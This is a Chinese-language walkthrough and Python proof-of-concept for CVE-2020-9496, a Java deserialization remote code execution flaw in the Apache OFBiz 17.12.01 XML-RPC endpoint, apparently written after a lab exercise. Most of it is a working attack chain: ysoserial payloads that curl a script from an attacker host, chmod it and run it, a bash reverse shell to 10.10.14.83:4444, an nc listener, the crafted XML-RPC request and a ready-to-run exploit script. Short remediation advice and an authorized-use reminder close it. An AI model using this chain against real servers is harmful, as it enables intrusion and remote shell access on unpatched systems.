Apache OFBiz 17.12.01 的远程命令执行漏洞 -Java 反序列化 + XML-RPC 请求机制

目录

漏洞原理

[🎯 一、漏洞背景（CVE-2020-9496）](#🎯 一、漏洞背景（CVE-2020-9496）)

[⚙️ 二、攻击原理简述](#⚙️ 二、攻击原理简述)

[🧱 三、完整攻击流程步骤详解](#🧱 三、完整攻击流程步骤详解)

[🔎 1. 信息收集](#🔎 1. 信息收集)

[🛠️ 2. 工具准备](#🛠️ 2. 工具准备)

[🧪 3. 构造初始 payload：下载恶意脚本](#🧪 3. 构造初始 payload：下载恶意脚本)

[📨 4. 构造 XML-RPC POST 请求](#📨 4. 构造 XML-RPC POST 请求)

[🧪 5. 启动临时 HTTP 服务器](#🧪 5. 启动临时 HTTP 服务器)

[🐚 6. 准备反弹 shell 的脚本 bash.sh](#🐚 6. 准备反弹 shell 的脚本 bash.sh)

[🧨 7. 第二个 payload：修改权限](#🧨 7. 第二个 payload：修改权限)

[💥 8. 第三个 payload：执行反弹脚本](#💥 8. 第三个 payload：执行反弹脚本)

[📡 9. 启动监听](#📡 9. 启动监听)

[✅ 四、攻击流程总结图（可选）](#✅ 四、攻击流程总结图（可选）)

[🔐 五、安全建议](#🔐 五、安全建议)

POC部分

[✅ 先决条件（手动准备）](#✅ 先决条件（手动准备）)

[🐍 Python POC 脚本](#🐍 Python POC 脚本)

[🧪 使用方法示例](#🧪 使用方法示例)

[❗ 安全提醒](#❗ 安全提醒)

---

漏洞原理

对 Apache OFBiz 17.12.01 的远程命令执行漏洞 （CVE-2020-9496）的完整利用过程，攻击原理是基于 Java 反序列化 + XML-RPC 请求机制。下面我将逐步分解整个过程，包括漏洞原理、具体步骤、工具使用和攻击链。

---

🎯 一、漏洞背景（CVE-2020-9496）

Apache OFBiz 是一个基于 Java 的开源企业资源计划软件。其 XML-RPC 接口在处理用户提供的 <serializable> XML 标签时，没有对反序列化对象进行严格校验，导致攻击者可以传入恶意序列化数据，在服务器端反序列化执行任意代码。

该漏洞存在于 /webtools/control/xmlrpc 接口。

---

⚙️ 二、攻击原理简述

1. 入口点 ：/webtools/control/xmlrpc 接口接受 XML-RPC 格式的请求。

2. 利用点 ：XML 内的 <serializable> 标签支持 Java 对象反序列化。

3. 漏洞点：OFBiz 未验证反序列化对象的安全性（无黑名单、白名单机制）。

4. 核心攻击技术 ：利用 ysoserial 工具构造一个恶意的 Java 序列化对象，包装在 XML 中，并通过 POST 请求发送，造成远程代码执行。

---

🧱 三、完整攻击流程步骤详解

🔎 1. 信息收集

• 目标网页登录界面暴露了 OFBiz 的版本：17.12.01

• 查询得知该版本存在 CVE-2020-9496

---

🛠️ 2. 工具准备

下载 ysoserial 以生成恶意 Java 反序列化 payload：

git clone https://github.com/frohoff/ysoserial
cd ysoserial
mvn clean package

---

🧪 3. 构造初始 payload：下载恶意脚本

java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "curl 10.10.14.83/bash.sh -o /tmp/bash.sh" | base64 | tr -d "\n"

说明：

• 使用 CommonsBeanutils1 gadget 生成恶意 Java 对象。

• 命令通过 curl 下载 payload（bash.sh）到 /tmp/bash.sh。

• 使用 base64 编码后放入 XML-RPC 请求的 <serializable> 部分。

---

📨 4. 构造 XML-RPC POST 请求

发送如下请求到目标的 /webtools/control/xmlrpc 接口：

POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
              [base64-payload]
              </serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

可以用 curl, Burp Suite, Python requests 等发送。

---

🧪 5. 启动临时 HTTP 服务器

为了让目标通过 curl 下载文件，攻击者启动一个 HTTP 服务：

python3 -m http.server

---

🐚 6. 准备反弹 shell 的脚本 bash.sh

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.83/4444 0>&1

---

🧨 7. 第二个 payload：修改权限

java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "chmod 777 /tmp/bash.sh" | base64 | tr -d "\n"

同样发送 XML-RPC 请求让目标服务器执行该 payload，赋予可执行权限。

---

💥 8. 第三个 payload：执行反弹脚本

java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "bash -c /tmp/bash.sh" | base64 | tr -d "\n"

最后一次请求触发反弹 shell。

---

📡 9. 启动监听

攻击者开启监听等待连接：

nc -lvvp 4444

目标执行脚本后，即可与攻击者建立反弹连接。

---

✅ 四、攻击流程总结图（可选）

[1] 信息收集
   ↓
[2] ysoserial 构造 payload（curl 下载）
   ↓
[3] POST XML 到 /webtools/control/xmlrpc
   ↓
[4] HTTP 服务器接收到 curl 请求
   ↓
[5] 构造 payload（chmod 脚本）
   ↓
[6] 构造 payload（执行脚本）
   ↓
[7] Netcat 接收到反弹连接

---

🔐 五、安全建议

1. 升级 Apache OFBiz 到安全版本（>= 17.12.02）。

2. 禁用或限制 /webtools/control/xmlrpc 接口的访问。

3. 使用 Java 反序列化防护机制（如 Apache Commons IO + ObjectInputFilter）。

4. 内部资产添加身份验证与访问控制。

---

POC部分

针对 Apache OFBiz CVE-2020-9496 的 利用 PoC（Proof of Concept）脚本，使用 Python 实现自动化发送恶意 XML-RPC 请求。该脚本会：

1. 使用你手动生成的 base64 payload（通过 ysoserial）

2. 构造 XML-RPC 请求体

3. 向 /webtools/control/xmlrpc 发送 POST 请求

---

✅ 先决条件（手动准备）

1. 安装 ysoserial，生成 payload，例如：

   java -jar ysoserial.jar CommonsBeanutils1 "id" | base64 | tr -d "\n"

2. 替换脚本中的 BASE64_PAYLOAD 内容为你生成的内容。

---

🐍 Python POC 脚本

import requests

# =============== 配置区域 ================
target_url = "https://127.0.0.1:8443/webtools/control/xmlrpc"  # 修改为你的目标
base64_payload = "<REPLACE_WITH_YOUR_BASE64_PAYLOAD>"          # 替换成你的base64内容
verify_ssl = False  # 关闭 SSL 验证（自签名证书时使用）

# =============== 构造 XML-RPC 请求 ================
xml_body = f'''<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
                {base64_payload}
              </serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
'''

headers = {
    "Content-Type": "application/xml",
    "User-Agent": "Mozilla/5.0"
}

# =============== 发送请求 ================
print("[*] Sending payload to target...")
response = requests.post(target_url, headers=headers, data=xml_body, verify=verify_ssl)

# =============== 输出结果 ================
print(f"[+] Response code: {response.status_code}")
print("[+] Response body:")
print(response.text)

---

🧪 使用方法示例

假设你想执行 whoami：

java -jar ysoserial.jar CommonsBeanutils1 "whoami" | base64 | tr -d "\n"

将生成的 base64 粘贴进脚本中，运行：

python3 exploit_ofbiz_cve2020_9496.py

---

❗ 安全提醒

该 PoC 仅限于授权测试或靶机环境使用，不得在未授权系统上运行！

---